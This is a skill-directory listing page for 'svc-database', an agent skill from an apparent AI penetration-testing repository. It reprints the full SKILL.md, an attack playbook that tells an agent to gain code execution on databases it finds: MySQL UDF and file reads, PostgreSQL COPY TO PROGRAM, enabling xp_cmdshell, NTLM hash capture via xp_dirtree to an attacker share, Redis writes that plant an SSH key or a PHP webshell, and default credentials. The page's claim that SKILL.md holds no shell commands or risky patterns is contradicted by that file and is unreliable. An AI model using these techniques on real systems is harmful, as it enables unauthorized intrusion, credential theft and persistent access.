Agent skill

Svc Database

by s0ld13rr in s0ld13rr/pentestcode

Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write.

MITAuto-check passedDatabases

Install Svc Database

skills CLI
$ npx skills add s0ld13rr/pentestcode --skill svc-database -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install s0ld13rr/pentestcode svc-database --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/s0ld13rr/pentestcode.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/services/database .claude/skills/svc-database && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
svc-database
GitHub stars
817
Token cost
~379 tokens
SKILL.md length
125 words
Files
1
Skills in repo
9
Repo updated
First seen
Licence
MIT

At a glance

Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write.

  • A database service is found
  • SKILL.md covers MySQL → RCE via UDF, PostgreSQL → RCE via COPY TO…, MSSQL → xp_cmdshell and Redis no-auth → RCE (two…, plus 2 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md
  • PostgreSQL 5432

What it does

Svc Database is an agent skill from s0ld13rr/pentestcode. Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write. Use when a database service is found. Triggers - MySQL 3306, PostgreSQL 5432, MSSQL 1433, Redis 6379, MongoDB 27017.

Its SKILL.md is about 380 tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Databases, covering NoSQL databases. It works with PostgreSQL, Redis, Microsoft SQL Server and MySQL. The repository describes itself as: PentestCode - Multi-agent AI penetration testing system with persistent engagement state, strategic coordination, and parallel autonomous operations. The licence is MIT.

When your agent uses it

  • A database service is found
  • PostgreSQL 5432

Example prompts

  • “/svc-database”

What it can do on your machine

Read from SKILL.md and the folder at commit 6053679. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Svc Database loads about 379 tokens when it runs. Until then it costs about 51 tokens; SKILL.md has 125 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~51
When it runs · the whole SKILL.md, loaded when a task matches
~379

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from s0ld13rr/pentestcode at commit 6053679, republished under its MIT licence (© s0ld13rr). 125 words, ~379 tokens.

Download SKILL.mdSave it as .claude/skills/svc-database/SKILL.md (or your agent's skills folder).
name
svc-database
description
Database RCE paths — UDF, xp_cmdshell, COPY TO PROGRAM, Redis key write. Use when a database service is found. Triggers - MySQL 3306, PostgreSQL 5432, MSSQL 1433, Redis 6379, MongoDB 27017.

Database — RCE & Escalation Paths

Standard enumeration (connect, list DBs, dump users) — you know this. Below is what matters.

MySQL → RCE via UDF

Requires FILE privilege + write access to plugin dir. Upload lib_mysqludf_sys.so → SELECT sys_exec('id'). Also: SELECT LOAD_FILE('/etc/passwd') for file read.

PostgreSQL → RCE via COPY TO PROGRAM

Requires superuser: COPY (SELECT '') TO PROGRAM 'id'; Alternative: large object import/export for file read/write.

MSSQL → xp_cmdshell

If disabled (common): EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Then: EXEC xp_cmdshell 'whoami'; Hash capture: EXEC xp_dirtree '\\ATTACKER\share'; → catch with Responder.

Redis no-auth → RCE (two methods)

SSH key write:

CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys
SET payload "\n\nssh-rsa AAAA...your_key...\n\n"
SAVE

Webshell (if web server co-hosted):

CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SET payload "<?php system($_GET['cmd']); ?>"
SAVE

MongoDB / Elasticsearch — no auth = full dump

Both default to no authentication. Connect and enumerate immediately.

Default creds worth trying

MySQL: root (no password), root/root. PostgreSQL: postgres/(empty). MSSQL: sa/(empty or common).

© s0ld13rr, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/services/database of s0ld13rr/pentestcode.

Open the folder on GitHubat commit 6053679

Compare with similar skills

Svc Database next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Svc Database compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Svc Database this skills0ld13rr/pentestcode817—~379Automated safety check: PassMIT
Railway Databasedavila7/claude-code-templates32k—~1.9kAutomated safety check: PassMIT
Use Sealoshashgraph-online/awesome-codex-plugins1.2k—~2.2kAutomated safety check: PassApache-2.0
Azure Database MigrationMicrosoftDocs/Agent-Skills775—~1.4kAutomated safety check: PassCC-BY-4.0
Database Install Skilljiushiwon/wg-skills110—~365Automated safety check: PassApache-2.0
Prisma Database Setupcurvenote/curvenote1693 repos~1.4kAutomated safety check: PassMIT

Similar skills

  • Railway Database

    davila7/claude-code-templates

    Add official Railway database services (Postgres, Redis, MySQL, MongoDB).

    32k GitHub stars~1.9k tokensUpdated today
    DatabasesAuto-check passed
  • Use Sealos

    hashgraph-online/awesome-codex-plugins

    Deploy and operate apps on Sealos Cloud: sign in to a Sealos account, deploy any project or self-hosted app (from the template store, an official Docker image, or project source code), provision…

    1.2k GitHub stars~2.2k tokensUpdated yesterday
    DatabasesAuto-check passed
  • Azure Database Migration

    MicrosoftDocs/Agent-Skills

    Official

    Expert knowledge for Azure Database Migration Service development including troubleshooting, decision making, limits & quotas, security, integrations & coding patterns, and deployment.

    775 GitHub stars~1.4k tokensUpdated yesterday
    DatabasesAuto-check passed
  • Database Install Skill

    jiushiwon/wg-skills

    数据库软件安装父技能。根据用户请求的数据库类型,分发到对应的子技能(PostgreSQL/MySQL/MongoDB/Redis)。当用户说「安装 PostgreSQL」「安装 MySQL」「安装 MongoDB」「安装 Redis」「安装数据库」时触发。

    110 GitHub stars~365 tokensUpdated 3 days ago
    DatabasesAuto-check passed
  • Prisma Database Setup

    curvenote/curvenote

    Guides for configuring Prisma with different database providers (PostgreSQL, MySQL, SQLite, MongoDB, etc.).

    169 GitHub starsUsed in 3 repos~1.4k tokens
    DatabasesAuto-check passed
  • Rhctl

    saidake/rhctl

    Run and author rhctl CLI workflows and remote environment scripts under scripts/ (PostgreSQL, JetStream, Docker, Redis, MongoDB, AWS LocalStack, execute/upload/patch).

    106 GitHub stars~4k tokensUpdated yesterday
    DatabasesAuto-check: notes

More from s0ld13rr/pentestcode

All 9 skills in this repo
  • Svc Docker K8s

    s0ld13rr/pentestcode

    Docker/Kubernetes attack techniques — exposed API abuse, container escape, RBAC/privileged-pod issues, secret theft.

    817 GitHub stars~648 tokensUpdated 5 days ago
    Auto-check passed
  • Svc Mobile Android

    s0ld13rr/pentestcode

    Android APK static analysis — OWASP Mobile Top 10, Retrofit API audit, transport security, smali reading, component export, auth flow analysis.

    817 GitHub stars~2.9k tokensUpdated 5 days ago
    Auto-check passed
  • Web Lfi Traversal

    s0ld13rr/pentestcode

    Path traversal / Local File Inclusion detection→file-read→RCE for web apps.

    817 GitHub stars~602 tokensUpdated 5 days ago
    Auto-check: notes
  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    817 GitHub stars~710 tokensUpdated 5 days ago
    Auto-check passed
  • Web Ssti

    s0ld13rr/pentestcode

    Server-Side Template Injection detection→engine-fingerprint→RCE for web apps.

    817 GitHub stars~621 tokensUpdated 5 days ago
    Auto-check passed
  • Web Xxe

    s0ld13rr/pentestcode

    XML External Entity injection detection→file-read/SSRF→proof for web apps.

    817 GitHub stars~585 tokensUpdated 5 days ago
    Auto-check passed

Categories

Questions about Svc Database

What does Svc Database do?

Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write. Svc Database is an agent skill from s0ld13rr/pentestcode. Database RCE paths — UDF, xpcmdshell, COPY TO PROGRAM, Redis key write.

When should I use Svc Database?

Svc Database fits situations like: A database service is found; postgreSQL 5432.

How do I install Svc Database in Claude Code?

Run `npx skills add s0ld13rr/pentestcode --skill svc-database -a claude-code`. Or copy the skill folder (skills/services/database in s0ld13rr/pentestcode) into .claude/skills/svc-database in your project. Claude Code loads it when a task matches its description.

How do I install Svc Database in Codex?

Run `npx skills add s0ld13rr/pentestcode --skill svc-database -a codex`. Or copy the skill folder (skills/services/database in s0ld13rr/pentestcode) into .agents/skills/svc-database in your project. Codex loads it when a task matches its description.

Can I use Svc Database in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add s0ld13rr/pentestcode --skill svc-database -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/svc-database, .gemini/skills/svc-database, .github/skills/svc-database and .opencode/skills/svc-database in your project.

What does Svc Database need to run?

SKILL.md names no scripts, command-line tools or credentials: Svc Database is instructions for the agent only.

Does Svc Database access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Svc Database safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Svc Database use?

Svc Database is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Svc Database use?

About 379 tokens (SKILL.md is roughly 1.5k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Svc Database?

Skills that share tags, products or a category with Svc Database: Railway Database (davila7/claude-code-templates, 32k stars), Use Sealos (hashgraph-online/awesome-codex-plugins, 1.2k stars), Azure Database Migration (MicrosoftDocs/Agent-Skills, 775 stars) and Database Install Skill (jiushiwon/wg-skills, 110 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Svc Database?

s0ld13rr (a GitHub user) maintains it in s0ld13rr/pentestcode, which has 817 GitHub stars. The repository holds 9 skills in this directory. The repository was last updated on October 2, 2026.

Source: s0ld13rr/pentestcode on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.